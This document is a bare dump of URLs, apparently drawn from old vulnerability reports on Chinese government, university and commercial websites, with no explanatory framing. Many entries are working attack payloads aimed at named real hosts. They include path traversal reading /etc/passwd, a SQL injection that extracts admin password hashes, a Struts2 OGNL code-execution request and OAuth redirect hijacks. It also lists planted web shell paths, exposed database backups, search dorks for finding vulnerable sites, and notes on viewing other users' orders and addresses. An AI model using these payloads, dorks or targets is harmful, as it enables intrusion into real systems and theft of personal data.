http://www.jbpsq.com/shop/authorize.asp?city=0&city_hid=-1&count=0&count_hid=&kword=1&prov=0&prov_hid=%d5%e3%bd%ad%ca%a1&submit=%b2%e9%d1%af http://help.tiantian.com; http://help.tiantian.com/resp/pensong.aspx; http://help.tiantian.com/resp/pensong.aspx http://www.jlmz.com.cn/detail/GoodDetail.aspx?goods_ID=34142&actPrice=aib.oo http://www.sanfu.com/?mod=ucp&do=address http://alumni.blcu.edu.cn:12881/uploads/plus/flink_add.php url:http://www.hdzfcg.gov.cn/hdcgweb/index.do http://www.jmyan.com/thread-105906-1-1.html http://115.182.51.171:8080/ http://360.taikang.com/fcb/safeSign.jsp配置指向 http://mall.taikang.com/ http://mall.taikang.com/DesktopModules/C_Info/web.config http://mall.taikang.com/DesktopModules/C_Info/WebService/web.config http://mall.taikang.com/webapp/policy/querypolicy/queryAccident.jsp www.moneyok.cn www.moneyok.cn https://www.moneyok.cn https://vpn.lib.tju.edu.cn https://221.213.45.231 https://202.113.20.208 https://202.113.49.100/ https://122.226.150.69 https://gljy.cn http://g.baofeng.com/ http://g.baofeng.com/event/getgoter http://g.baofeng.com/admin/login http://www.bytstrip.com/plus/flink_add.php http://www.wmgc.cn/ sxnzzx.com/****/*****.asp http://gdhg.kugou.com//worksdetail.php?musicId=2453307&period=2 http://pub.px.gw.com.cn/fckeditor/editor/fckeditor.html index.php/AbUser/getOrderDetail/ cn:8029 http://www.citrix.com.cn/articleShare/user.asp http://www.tuniu.com/u/orderdetail/3301443 http://www.tuniu.com/yii.php?r=user/user/downloadFile/&id=67[隐私处理]34&orderId=3301443 http://www.myships.com/ShipLBS/login.jsp http://www.sdngy.edu.cn/xbsz/jcb/CompHonorBig.asp?id=33 http://u.qmango.com/uploadify_jm_hotel.aspx?hotelid=45131&huserid=【USER】 http://kexie.tancheng.gov.cn/ http://kexie.tancheng.gov.cn/kjzp/zpsc/upload.asp http://kexie.tancheng.gov.cn/kjzp/zpsc/upload/cfwansui.asp http://www.ayx.gov.cn/admin/word/upfile.asp http://www.515weizhi.com/login.aspx账号:admin http://123.126.32.139:8080/management/index.do http://www.lawnewscn.com/plus/flink_add.php http://www.cyepb.gov.cn/Manage/Login.aspx http://59.49.20.242/ http://ma.apps.cctv.com/Enterprise/EnterpriseSearch.jsp http://jlxzxk.zjbts.gov.cn:93/UserManage/UserApply.aspx http://jlxzxk.zjbts.gov.cn:93/Login.aspx http://jlxzxk.zjbts.gov.cn:93/UploadFiles/s55555555/20140430204221662.asp http://192.168.13.107:8000/Service1.asmx http://1**.**.**.7/Service1.asmx"/ http://1.*.*.*/OpenMasService"/ http://www.tchjbh.gov.cn http://www.tchjbh.gov.cn/news_display.php?id=259 www.tchjbh.gov.cn/news_display.php?id=148 http://sqlmap.org http://www.reeyee.com http://www.reeyee.cn http://www.reeyee.net http://www.cheryacteco.com http://www.cheryplus.com http://www.picc-js.com http://www.bqls.net http://www.tx-hoto.com http://www.reeyee.cn/case/中查看。 http://www.cheryplus.com/admin/inc/dialogbox.php?pDir=&curr_dir=../../../&type=0&filetypes=&form=frmList&formname=brief_img http://202.119.148.83/admin/inc/wnews.php?type=1&path=video&form=frmList&formname=img http://www.wiiboox.cn/admin/inc/wnews.php?type=1&path=video.php&form=frmList&formname=img http://www.tx-hoto.com为例,向目标/admin/inc/wnewssave.php发起如下HTTP请求,注意Cookie值及filename值: http://www.tx-hoto.com/admin/inc/wnewssave.php?formname=src&form=frmList www.tx-hoto.com http://golf.cctv.com/function/2013gold_court/search.php http://golf.cctv.com/e/extend/ask/AskResult.php drops.wooyun.org/webview.html http://g.10086.cn/spbbs/index.php http://www.foowu365.com/i.php http://www.foowu365.com/config.inc.bak数据库配置信息泄露 http://www.foowu365.com/ http://tongji.sogou.com/ http://tongji.sogou.com/login_login.action http://www.foowu365.com/bbs/uc_server http://www.t3.com.cn/ticket_-639491981123409256.htm http://news.gbicom.cn/plus/flink_add.php http://news.gbicom.cn/plus/flink.php http://news.gbicom.cn/gbicom/login.php http://www.pziad.com/post_problem.php http://www.pziad.com/problem.php http://m.sanfu.com/order/orderInfo.htm?orderInfo.id=70563中的orderInfo.id的值,可参考任意订单 http://m.sanfu.com/self/showUserAdd.htm?userAdd.id=36132&path=success中的userAdd.id,可查看任意用户的地址信息 https://auth.alipay.com/login/homeB.htm?redirectType=parent http://vip.yonyou.com/Admin/Adminlogin.aspx http://211.151.146.64/login.jsp http://labs.chinamobile.com/imic/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.jpg http://www.carslan.com.cn/backup/db-backup-1396080877-f66ed7ebf21afcf3b09bdc082ec57235.sql jwc.sau.edu.cn/ACTIONSHOWFILES.APPPROCESS?mode=1&FolderID=49 jwc.sau.edu.cn/ACTIONSHOWFILES.APPPROCESS?FolderID=49 inurl:/ACTIONSHOWFILES.APPPROCESS?mode=1 jw.bhcy.cn/ACTIONSHOWFILES.APPPROCESS?FolderID=104 jwc.syphu.edu.cn/ACTIONSHOWFILES.APPPROCESS?FolderID=88 jw.hrbeu.edu.cn/ACTIONSHOWFILES.APPPROCESS?FolderID=82 http://www.glfuda.com/news/newsDetail.aspx?type=nv&id=380 http://www.glfuda.com/news/newsDetail.aspx?type=nv&id=99999999 http://unicom.huacai.cn http://124.172.221.86:81/ http://124.172.221.86:81/Ftp/Pic/ http://www.cadc.gov.cn/upload/Files/GreenMail/2021/ http://www.cdwh.gov.cn/ http://alumni.sjtu.edu.cn/alumni/xiaoyaohui/shell.asp http://alumni.sjtu.edu.cn/alumni/xiaoyaohui/cmd.asp http://postd.sjtu.edu.cn/shell.asp http://postd.sjtu.edu.cn/cmd.asp http://game.letv.com/ http://game.letv.com/bbs/space.php?uid=100000005 http://202.205.99.136:8080/DpWeb/dp-web!index.action http://renrenhelper.sinaapp.com/run/list.php?uid= http://renrenhelper.sinaapp.com/run/list.php?uid=327827630 inurl:Infos/MoreInfos.aspx http://www.xmhlkj.gov.cn/file/index.asp http://www.astc.gov.cn/file/index.asp http://www.xmhlkj.gov.cn/ManageModule/Info/fckeditor/editor/filemanager/connectors/uploadtest.html http://www.astc.gov.cn/ManageModule/Info/fckeditor/editor/filemanager/connectors/uploadtest.html http://www.jimeikj.gov.cn/ManageModule/Info/fckeditor/editor/filemanager/connectors/uploadtest.html http://www.xmhlkj.gov.cn/managemodule/info/ftb.imagegallery.aspx http://www.astc.gov.cn/managemodule/info/ftb.imagegallery.aspx http://www.jimeikj.gov.cn/managemodule/info/ftb.imagegallery.aspx http://oa.letv.com/ http://hn.coop168.com/PointNewsDetails.php?articalId=448¢erid=33 http://hn.coop168.com/login.php http://tb.sogou.com/insert.php?url=http%3a%2f%2fse.cdn.sogou.com%2fapk_Install_2.2.0.12446.zip&md5=F918BF5773F2FC1569CC1974C1DF5742&size=2188000&mode=2&uid=2B754ADAC19E2444806FB84273D317CB http://www.skyclass.cn/)开发的精品课程软件,用户众多 URL:http://网站地址/sc8/sourceindex/search-bysubject.do http://jx.swufe.edu.cn/sc8/sourceindex/search-bysubject.do?pageId=4&subjectCode=1-01 http://www.qinghua-edu.com/web.rar http://www.sxmz.gov.cn/content/topicdeal.jsp?id=1&action=read http://www.sxycmz.gov.cn/content/topicdeal.jsp?id=1&action=read http://www.jcmzj.gov.cn/content/topicdeal.jsp?id=1&action=read http://www.sxlfmz.gov.cn/content/topicdeal.jsp?id=1&action=read http://www.dtcqmzj.gov.cn/content/topicdeal.jsp?id=1&action=read http://www.sxszmz.gov.cn/content/topicdeal.jsp?id=1&action=read http://www.yqmzj.gov.cn/content/topicdeal.jsp?id=1&action=read http://www.sxfb.gov.cn/content/topicdeal.jsp?id=1&action=read http://www.shanxilr.gov.cn:8080/content/topicdeal.jsp?id=1&action=read http://project.ccidnet.com/cases/index.shtml http://szhxy.guet.edu.cn/qxgl/public/AllNews.aspx?type=1 http://szhxy.guet.edu.cn/qxgl/public/AllNews.aspx?type=99999999 http://szhxy.guet.edu.cn/qxgl/pf/ajaxscore.htm?ScoreType=0^lsh=26253 http://3gztc.wo.com.cn/wo_pc/product.jsp?id=40610 http://3gztc.wo.com.cn/showSoft.jsp?id=10119 http://3gztc.wo.com.cn/wo_pc/list.jsp?n=jx&v0=联想&v1=20&v http://3gztc.wo.com.cn/login.jsp http://125.90.3.222/out/Bulletin/Businessview.aspx?infoflowId=01581 http://218.14.215.4/out/ViewSource/SrcStencilList.aspx?listType=&infoflowId=01570 http://hdjl.scjt.gov.cn:98/scjt/frontSendMsgServlet?method=findMsgView&msgtype=0 http://www.meizhou.gov.cn/open/index.php?NodeID=872&u=14 http://www.zjszsf.gov.cn/actionservlet/flrzdetail.jsp?DBID=452 http://www.hyx.gov.cn/sssweb/OnlineVote/fvote.aspx?questionnaireID=9374d487-6478-487c-9d39-e7ead8bfca4a http://www.chit.org.cn/webmaster\ http://www.haijia.com.cn/ReguBusLine.aspx,存在搜索型注入 http://www.libsys.com.cn/downloadmore.php?pid=libsys5.0_setup_appserver Data:pid=libsys5.0_setup_appserver http://www.libsys.com.cn/dl_choice.php?p_type=&u_name=WCRTESTINPUT000000&p_code=WCRTESTINPUT000001&cert=WCRTESTINPUT000002&duty=WCRTESTINPUT000003&dept=WCRTESTINPUT000004&email=WCRTESTINPUT000005& Data:p_type=&u_name=WCRTESTINPUT000000&p_code=WCRTESTINPUT000001&cert=WCRTESTINPUT000002&duty=WCRTESTINPUT000003&dept=WCRTESTINPUT000004&email=WCRTESTINPUT000005& http://www.libsys.com.cn/downloadfile.php?pid=libsys5.0all http://www.fadongxi.com/ http://www.diji.com.cn:8080/landregister/index.action http://training.chinanetwork.net.cn/webv9/Part/PatrolInfo/AddressPage.aspx http://exam.sset.org.cn:8080/exam1/index.action http://st.scu.edu.cn/kyjd/DocumentView.aspx?ArticleShowID=6 http://saa.scu.edu.cn/tongzhigg/xueyuantzArticle.aspx?noticeid=43 http://jy.scu.edu.cn/jiuye/shownews.php?type_id=4&newsid=1708 http://zs.scu.edu.cn/zhaosheng/detail.php?id=4424 http://www.colorful.cn/ColorfulProductdetails.aspx?id=13014094ae9ed39042e1b7de976f95bd5f25 http://en.chinanetcenter.com/pages/about-us/i http://lafgirl.youku.com/ http://lafgirl.youku.com/!~udza7q/login.html,没发现什么问题 inurl:vpnweb/index.php?para=index https://1.202.234.22/vpnweb/index.php?para=index http://www.baidu.com/s?word=%22%3E'%3e%3Ciframe%3E http://www.shajia.cn/business_cont.php?id=749 http://www.552cai.com:8080/info/news!index.action http://youhui.buding.cn/360/destine.php?city_id=2&shop_id=1 http://ebidding.lenovo.com.cn/Dictionary/area/RegionChange.aspx?controlId=ddlRegion2&parentId=-1 http://wo.zdnet.com.cn http://www.sztvu.com/ http://www.sztvu.com/jyzdbgs/mdb/db1.mdb http://show.qq.com/ http://show.qq.com/?ADTAG=client.im.card.qqshow&opuin=这里改成你要登录的QQ号&ptlang=2052#u%3DphotoShow/html/index.html%253Fsex%253DUM%2526rcount%253D0 http://wanjiang.dg.gov.cn/lk_admin/login.aspx http://www.chinanetwork.com.cn/w8/pages/sys/annone.aspx?id=32bf330e-f925-4336-a625-68bd5dffc80b inurl:subclass site:server.zdnet.com.cn http://security.zdnet.com.cn/files/search.php?date=201405&subclass=707 http://stor-age.zdnet.com.cn/files/search.php?date=201405&subclass=728 http://mobile.zdnet.com.cn/files/search.php?date=201305&subclass=979 http://net.zdnet.com.cn/files/search.php?date=201405&subclass=679 http://ec.zdnet.com.cn/files/searchs.php?date=&subclass= http://video.zdnet.com.cn/files/search.php?subclass=0&t=0 http://server.zdnet.com.cn/files/search.php?subclass=0&t=0 http://download.zdnet.com.cn/files/search.php?subclass=0&t=0&p=5&sort=&brief=&manu_name=&key=&category=&os=&publish_date=&licence=&hit=&size= http://download.zdnet.com.cn/files/search.php?subclass=0&t=0&p=5&sort=&brief=&manu_name=&key=&category=&os=&publish_date=&licence=&hit=&size= http://soft.zdnet.com.cn/files/search.php?date=200710&subclass=0&p=2 http://house.xizi.com/index.php?a=list_house&areaid=88952634&price=88952634&htypeid=88952634&m=house&c=index http://bbs.xizi.com/read.php?tid=2436716&otid=&page= http://bbs.xizi.com/xz_newshow.php?action=activity&type=0 http://job.xizi.com/index.php?action=personal&option=search&extent=index http://job.xizi.com/index.php?action=member&option=login http://house.xizi.com/index.php?m=house&c=index&a=list_house&areaid=88952634&housetype=88952634&price=88952634&keywords=88952634 http://to.xizi.com/?m=discount&c=index&a=init&info%5Bstarttime%5D=88952634&info%5Bendtime%5D=88952634&dosubmit=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD http://bbs.xizi.com/read.php?tid=3077045&mfid=719&mapper=true&otid=&page=2 http://hm.xizi.com/?m=government&c=shops&a=show&id=1711&sid=652 http://house.xizi.com/index.php?m=house&c=index&a=list_house&listorder=avgprice-DESC http://job.xizi.com/index.php?action=personal&option=search&extent=index http://hd.xizi.com/xz_newshow.php?action=activity&type=0 http://news.zhulong.com/read_news_show_pl.asp?id=188916 http://cam.tju.edu.cn/tju/achiev/index.php?id1=10&y=2014 http://cam.tju.edu.cn/tju/moreNews.php?viewNum=2&sid=9 http://cam.tju.edu.cn/tju/newsDetail.php?id=36 http://cam.tju.edu.cn/tju/newsList.php?viewMod=xxx http://cam.tju.edu.cn/tju/moreNews.php?viewNum=1 http://cam.tju.edu.cn/tju/moreNews.php?viewNum=2&sid=9 http://cam.tju.edu.cn/tju/achiev/index.php?id1=10 www.weimob.com/snsmobile?id=1472&v=555c3efd5c1f6c44004dda76628f25f9&pid=95967&wechat_id=fromUsername www.colorful.cn http://www.colorful.cn/ColorfulAwards.aspx?colorfulid=4&Time=2013 http://www.colorful.cn/ColorfulNetwork_product.aspx?Cataid=12101509594818660dc6d78062fef4d73a8b http://www.colorful.cn/JishuList.aspx?id=12101509594818660dc6d78062fef4d73a8b http://www.colorful.cn/ColorfulNewDetails.aspx?id=1312c321776344fe4975917d082db085326b http://www.colorful.cn/ColorfulProductdetails.aspx?id=130781bbf68a799442b6b7183b642caca75a http://admin.colorful.cn/Common/ShowMobileImage.ashx?id=1404f2e9c238627c4b05a82aa0069108b6f0 http://admin.colorful.cn/Common/ShowImage.ashx?id=1307f25a656aa4ea45838d73e64b1ead6602 http://admin.colorful.cn/Common/ShowImage.ashx?id=13125b9f760c3a9742629e752fb4b9b2d46c&width=55&height=55 http://m.colorful.cn/NewDetails.aspx?id=1312c321776344fe4975917d082db085326b http://m.colorful.cn/ColorfulAwards.aspx?colorfulid=4 http://m.colorful.cn/ColorfulAwards.aspx?Time=2013 http://m.colorful.cn/ProductDetails.aspx?id=13080918d7c248a04845925d64d040587611&CataId=1210091043471234035ab2610de009ec8235 http://m.colorful.cn/ProductDetails.aspx?id=668f8384-0685-4a70-895c-8f9eb39db020 http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA http://www.gjtjt.cn:8080/ http://www.gjtjt.cn:8081/ www.nikon.com.cn/db.rar www.nikon.com.cn/pass.exe http://yy.sogou.com/gamecenter/ Date:2014-04-30 OS:Windows http://yy.sogou.com/gamecenter/ http://11185.bjpost.com.cn:80/fp/other/member!memberLogin.action http://bt.ktxp.com/db.rar http://bt.ktxp.com/pass.exe http://bt.ktxp.com/wwwroot.zip http://bt.ktxp.com/backup.rar http://bp.maxthon.com/gl?l=cn&p=max4&c=zh-cn http://180.153.27.6/zc/ http://www.air-spring.com/zc/ www.air-spring.com http://www.air-spring.com http://cloud.letv.com/ledisk//appupdate/index?v http://vip.cctd.com.cn/jsp/index.action?page=index http://www.gzipo.gov.cn/admin/jsp/cms/content/attachment/attachment.jsp?module=001010&contentId=0 http://www.ncsshk.com/manage/ewebeditor/db/ewebeditor.mdb http://www.ncsshk.com/manage/Main.asp http://www.xk57.com/listen/en/歌曲编号 http://www.xk57.com/listen/vip/歌曲编号 http://www.xk57.com/listen/zb/歌曲编号 http://www.neworiental-k12.org/ http://www.neworiental-k12.org/search.asp http://www.utt.com.cn/ http://www.sanfu.com/?do=display&mod=goods&id=6596 http://www.sanfu.com/admin/ http://58.22.154.146/users/ http://58.22.154.146/download/ http://58.22.154.146/System/ http://58.22.154.146/report/ http://58.22.154.146/Images/ http://58.22.154.146/Inc/ http://58.22.154.146:1001/ inurl:Art_View.asp?ID= inurl:asp?ID= http://www.xhkjj.gov.cn/Art_View.asp?ID=677 http://www.wysxmj.gov.cn/Art_View.asp?ID=422 http://www.sctrh.com/Art_View.asp?ID=242 http://www.dzzwy.com/Art_View.asp?ID=329 http://www.dzqxfc.com/Art_View.asp?ID=94 http://www.dzngfzyr.com/Pic_View.asp?ID=41 http://www.hxjzjx.cn/Pic_View.asp?ID=261 http://www.dzjinheng.cn/Art_View.asp?ID=142 http://www.pxgas.cn/Art_View.asp?ID=318 http://www.dfssilk.com/NewsView.asp?ID=587 http://183.60.44.5/platform/login.php http://www.google.de/#newwindow=1&q=/zlxz/down.aspx http://www.lhfgc.gov.cn/zlxz/down.aspx http://www.lhfgc.gov.cn/zlxz/down.aspx?Url=../zlxz/down.aspx.cs http://www.lhfgc.gov.cn/zlxz/down.aspx?Url=../web.config http://www.ciemc.net/ http://lvyou.baidu.com/user/edit/info http://www.kmdc.gov.cn/gov/list.ashx?id=428&typeId=1 http://onlinemsg.focus.cn/onlinemsg/sendmessage_f.php?senduser_id=1443102 http://onlinemsg.focus.cn/onlinemsg/sendmessage_f.php?senduser_id=1443102 http://blogimg.focus.cn/common/modules/esfmsg/sendmessage_f.php?senduser_id=1443102 http://db.178.com/d3/tw/item-list/q:9 ftp://ftp.founder.com.cn/incoming/ http://data.auto.sina.com.cn/xuanche/getCars.php www.ciprun.cn http://fun.kid.qq.com/ebookController/update_assets_list?campaignID=0%20and%201=1&etclass=0&formatID=3&t=Sun%20May%204%2012%3A56%3A49%20GMT%2B0800%202014&tags=null&templateID=478 http://fun.kid.qq.com/ebookController/update_assets_list?campaignID=0%20and%201=2&etclass=0&formatID=3&t=Sun%20May%204%2012%3A56%3A49%20GMT%2B0800%202014&tags=null&templateID=478 http://career.huawei.com/campus/pages/job/job.aspx inurl:sydwzk/demand inurl:sydwzk/download/Down.jsp http://www.zzsyzp.com/syrcservlet?RequestType=SHOWINFO&memberID=10136&RightCode=Guest&InfoFlag=info http://office.sh.focus.cn/rentsale/agent_rentsale.php?chk_login_id=45654032 http://office.sz.focus.cn/rentsale/agent_rentsale.php?chk_login_id=20512622 http://office.sh.focus.cn/rentsale/agent_rentsale.php?chk_login_id=45654032&chk_gov_locate_id=10&chk_loopline=%B2%BB%CF%DE%BD%BB%CD%A8%CE%BB%D6%C3&chk_business_circles=%B2%BB%CF%DE%C9%CC%C8%A6&chk_usinged=%B2%BB%CF%DE%D3%C3%CD%BE&chk_fitment=%B2%BB%CF%DE%D7%B0%D0%DE&chk_rentsale=%B2%BB%CF%DE%D7%E2%CA%DB&chk_sort_price_min=&chk_sort_price_max=&chk_sort_rent_min=&chk_sort_rent_max=&chk_area_min=&chk_area_max=&chk_office_name=%CA%E4%C8%EB%B9%D8%BC%FC%D7%D6&Submit_btn=%CB%D1%CB%F7 zb.suning.com/bid-web/picView.htm?name=../../../../../../../../../../etc/passwd zb.suning.com/bid-web/picView.htm?name=../../../../../../../../../../etc/hosts zb.suning.com/bid-web/picView.htm?name=../../../../../../../../../../etc/resolv.conf http://ipay.iapppay.com:8888/admin/g/login.do http://service.iapppay.com:8081/admin/g/login.do http://zhandian.cctv.com/ http://zhandian.cctv.com//webs.php?id=20 http://finance.qq.com/stock/sother/flow_dapan_quotpage.htm http://pages.chinahr.com/2012/bj/spacechina_0327/jobs.asp?chiMemID=200504010002350134&strMemID=200504010002350005 http://223.68.154.38:8000/lms_server/user/userAuthenticate.action http://www.mlecms.com http://www.hihoku.com/plus/recommend.php?aid=1&_FILES[type][name]&_FILES[type][size]&_FILES[type][type]&_FILES[type][tmp_name]=aa\%27and+char%28@%60%27%60%29+/*!50000Union*/+/*!50000SeLect*/+1,2,3,group_concat%28userid,0x23,pwd%29,5,6,7,8,9%20from%20%60%23@__admin%60%23 https://api.kaixin001.com/oauth2/authorize?client_id=28204214253735367b372d8ced8ef6a5&redirect_uri=http%3A%2F%2Fdiaoyu.org\.passport.kuxun.cn%2Fopenid%2Flogin_kaixin_back&response_type=code&state=4b207c0b266cfcb3ad22058b1aa9b78e&scope=create_records http://suanming.kaiyun.china.com/admin/ http://openapi.qzone.qq.com/oauth/show?which=Login&display=pc&scope=get_user_info%2Cget_info%2Cadd_t%2Cadd_pic_t%2Cget_other_info%2Cget_fanslist%2Cget_idollist%2Cadd_idol%2Cadd_share&redirect_uri=http%3A%2F%2Fpujun.li?@www.zhihu.com%2Foauth%2Fauth%2Frequest_qqconn_token%3Fnext%3D%252Foauth%252Faccount_callback&response_type=code&client_id=100490701 http://www.dianping.com/review/52233135 http://app.bbs.ifeng.com/dkjs/data.php?callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined http://yksuit.com/ http://events.dianping.com/guphoto/game.aspx#1 http://o.sys.www.dianping.com/opreply/reply/detailsManage.action?feedType=11&feedId=3928344 http://www.sigmarobot.com/ http://www.sigmarobot.com/downfile.php?direct=../&file=downfile.php http://www.sigmarobot.com/downfile.php?direct=../&file=utility.php http://www.letvcloud.com/乐视云视频 http://222.240.205.133/wwwroot.rar http://www.mfb.sh.cn/ http://www.xnrf.gov.cn/viewnews.asp?id=432 https://api.weibo.com/oauth2/authorize?client_id=2857799177&redirect_uri=https%3A%2F%2Fdiaoyu.org:\@sae.sina.com.cn%2Fssl%2F%3Fm%3Dsso%26a%3Dweibo_callback%26sccb%3Dhttp%253A%252F%252Fsae.sina.com.cn%252F%253Fm%253Duser%2526a%253Dreg_check_login&response_type=code&forcelogin=true inurl:mail site:homeinns.com intitle:login site:homeinns.com http://shufang.docin.com/ http://tushu.docin.com/ http://huiyi.docin.com/ http://ganjinzhe.com//WEB-INF/database.properties http://resolve.chinanetcenter.com/receiveMail.py http://qudao.dac.pplive.cn/dac/ http://www.sstf.org.cn/show_news.asp?idx=672&act=4 http://www.nanlou.cn/114/showdetail.jsp?oid=543注入漏洞 http://www.hzplanning.gov.cn/DesktopModules/GHJ.PlanningNotice/PublicityInfoGH.aspx?GUID=20131211173416817 http://jxkh.gtja.com/guest/Ask/MyAskList.aspx?QueType= ftp://59.63.169.44/ http://authentication.shop.letv.com/api/web/update/getCpsInfo.jsonp?cps_id=le_pc_pcrx_dh_xbgpdyssp_prom_h_cjds&callback=updCpsCookieTime http://authentication.shop.letv.com/api/web/update/getCpsInfo.jsonp?cps_id=le_pc_pcrx_dh_xbgpdyssp_prom_h_cjds\ http://authentication.shop.letv.com/api/web/update/getCpsInfo.jsonp?cps_id=le_pc_pcrx_dh_xbgpdyssp_prom_h_cjds\ http://authentication.shop.letv.com/api/web/update/getCpsInfo.jsonp?cps_id=le_pc_pcrx_dh_xbgpdyssp_prom_h_cjds\ http://authentication.shop.letv.com/api/web/update/getCpsInfo.jsonp?cps_id=le_pc_pcrx_dh_xbgpdyssp_prom_h_cjds\ http://www.aheport.gov.cn/tabid/177/language/zh-CN/Default.aspx?GUID=3cfe24aa-c4de-496c-aa79-028de52c79cf http://home.focus.cn/materials/owner_info.php?owner_id=5 http://sz.focus.cn/materials/owner_info.php?owner_id=46 http://cd.focus.cn/materials/owner_info.php?owner_id=9 http://wh.focus.cn/materials/owner_info.php?owner_id=14 http://cq.focus.cn/materials/owner_info.php?owner_id=6 http://acm.pptv.com/ http://cooperation.pplive.com/ http://sr3.pplive.com/upload.php(已修复) http://www.pz.gov.cn/pzweb/GovInfoPub/Department/moreinfo.aspx?DeptCode=001&CategoryNum=001001 http://fuyun.safedog.cn/serverCenter/saveServerTask.html?_t_=随意&__t=随意&serverId=你的服务id&type=12 http://www.first.gov.cn/Main/DeptSubList.aspx?deptcode=403000&deptname=%B0%B2%BB%D5%CA%A1%B9%FA%CD%C1%D7%CA%D4%B4%CC%FC http://www.cmdi.chinamobile.com/ https://bambookbbs.sdo.com/ http://mail.imun.edu.cn:8080/gw/admin/ http://ows-dfppe.sf-express.com/ows-dfp/$%7Bpath%7D/coverage_area!getCoverageCityList.action url:http://www.jmyan.com/uc_server/admin.php?m=user&a=login&iframe=&sid= http://studytv.cctv.com/ http://studytv.cctv.com/activity/list?KeyWord=1 http://hegui.xsdzq.cn:8080/ksportal/aml/map/mapbranchinfo.jsp?area_id=29正常,http://hegui.xsdzq.cn:8080/ksportal/aml/map/mapbranchinfo.jsp?area_id=29报错,即可能存在SQL注入,带入SQLMAP工具 http://www.fyyhbank.com/display.php?id=328 http://www.cncn.org.cn/ http://ows-dfppe.sf-express.com/ows-dfp/service_time!getCityByProvince.action http://ows-dfppe.sf-express.com/ows-dfp/service_time!getAreaByCity.action http://ows-dfppe.sf-express.com/ows-dfp/service_time!getCountyByArea.action http://www.xd.com/email_verify/email_set/?email=189837992%40qq.com&_=1399282088546 http://www.xd.com/security/forget_pass http://multimedia.tcl.com/cn/general/main.do?method=search&keyword=aa http://home.focus.cn/group/vote.php?v_poll_id=4679'&group_id=607 hyfw.12306.cn/hyinfo/action/JgxxAction_jsjjfl http://hyfw.12306.cn http://wf.tju.edu.cn/zh_wx/sub3.php?type=5&id=4 hack:site:gov.cn inurl:new_info_dowload.jsp http://www.jx-star.com/xtgly/new_info_dowload.jsp?wj=/WEB-INF/web.xml http://bbs.tcl.com/survey/Survey/PSW_.asp?url%EF%BC%9D201232614496.asp http://tdm.rails.com.cn/login/loginDown!onDownload.action http://lighting.tcl.com/cn/resources-d.aspx?ID=401&SortID=98 http://wap.alpha.wochacha.com/.svn/entries http://www.familymart.com.cn/system/login http://www.familymart.com.cn/system/brand/BrandEdit?id=16 http://d1.sina.com.cn/litong/zhitou/sinaads/release/pbv5.html?flash${}http://xxx.sina.com.cn/%22${}http://s.sina.com.cn/%22xxx${}950${}450${}http://sax.sina.com.cn/mfp/click?ccc&a=%3Cmeta%20charset=%22utf-8%22%3E http://cie.lnc.edu.cn/ http://mss-oa.taikanglife.com/login/userInfo!isCanSendPwd.action http://demo.hanweb.com/jact/admin/login/login.action http://bbs.51credit.com/forum.php?mod=viewthread&tid=1816118&extra=page%3D1 http://jjy.hubu.edu.cn/index.action http://www.spgbid.com/spgbid/homeAction/homeAction.action http://www.spgbid.com/system.jsp http://vcloud.sdidc.com.cn/product.do?act=productlist&type=402881ff3cfa6aec013cfa8aa6fa0010 http://vcloud.sdidc.com.cn/login.do?act=logout http://cssotest.kingdee.com/ http://cssotest.kingdee.com/knowledge/search/searchKnowledge!knowledgeSearch.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://bjd.tcl.com/ http://www.bj.10086.cn/service/fee/czjf/ http://epay.bj.chinamobile.com/paymentAction.do?method=queryBalance2&payPhone=13811543995 http://www.muzhiwan.com/ http://openapi.qzone.qq.com/oauth/show?which=ConfirmPage&display=pc&response_type=code&client_id=204566&redirect_uri=http%3A%2F%2Fapp.56.com\@pujun.li&state=048cf6b68d98606939f0287860c53235 http://mse.tju.edu.cn/gtxb/artd.php?ty=4&tp=2 http://www.capub.cn:8888/ site:www.capub.cn http://www.yibao.com/api/rest.php/createBanner?advertising_id=17 http://www.yibao.com/api/rest.php/createBanner?advertising_id=17 http://www.yibao.com/api/rest.php/createBanner?advertising_id=17 http://tool.chinaz.com/pagestatus/?url=www.goodidc.org www.dagexing.com www.dagexing.com http://book.dahe.cn http://book.dahe.cn/book/view.asp?bh=316392 www.dagexing.com存在OpenSSL漏洞,请尽快修补! http://www.maxen.com.cn/map/map.php?id=2 http://www.maxen.com.cn/test.php http://demo.ev123.net/dom/register.php inurl:info_details.jsp?seq http://211.87.126.13/index/editor/admin/login.jsp http://xggl.bjmu.edu.cn:8081/eWebEditor_V5.0/admin/default.jsp http://www.usrn.edu.cn/eWebEditor_V5.0/admin/default.jsp http://210.38.57.70:8180/eWebEditor_V5.0/admin/default.jsp http://211.65.116.18/editor/admin/default.jsp http://202.204.208.108:8092/ftc/editor/admin/login.jsp http://www.biem.edu.cn/editor/admin/default.jsp https://udb.duowan.com/s/yyid/index.do http://www.aachina.net/search.php?search=search&searchword=4Cub3IhuFH6 http://zj.qq.com/a/20140506/008144.htm http://page.vote.qq.com/?id=6225490&tpl=mini&result=no 